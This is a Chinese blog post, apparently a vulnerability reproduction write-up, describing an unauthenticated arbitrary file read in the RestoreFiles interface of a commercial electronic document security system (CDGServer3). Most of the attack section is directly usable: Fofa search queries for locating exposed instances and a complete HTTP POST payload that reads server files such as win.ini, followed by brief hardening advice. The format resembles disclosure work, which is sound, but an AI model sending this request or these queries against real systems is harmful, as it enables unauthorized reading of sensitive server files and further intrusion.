【漏洞复现】某赛通 电子文档安全管理系统 RestoreFiles 任意文件读取

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

漏洞描述

RestoreFiles 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。

网络空间测绘

Fofa

body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" ||body="/help/getEditionInfo.jsp"||body="/CDGServer3/index.jsp"

image.png

漏洞复现

POST /CDGServer3/document/RestoreFiles;login HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

command=DownloadDoc&fileNameForDownload=&downPath=c:///windows/win.ini

image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-17 02:04:02       67 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-17 02:04:02       72 阅读
  3. 在Django里面运行非项目文件

    2024-07-17 02:04:02       58 阅读
  4. Python语言-面向对象

    2024-07-17 02:04:02       69 阅读

热门阅读

  1. 记录第一次因为数据库事务产生的BUG

    2024-07-17 02:04:02       18 阅读
  2. 量化机器人如何提升交易透明度?

    2024-07-17 02:04:02       23 阅读
  3. Flutter基本概念&常用命名

    2024-07-17 02:04:02       23 阅读
  4. AI对开发者的影响:重塑技能、职业与生活

    2024-07-17 02:04:02       24 阅读
  5. CloudCone服务器2核1G一年只需15刀

    2024-07-17 02:04:02       19 阅读
  6. zookeeper+kafka消息队列群集部署

    2024-07-17 02:04:02       20 阅读
  7. Webflux中的订阅关系

    2024-07-17 02:04:02       20 阅读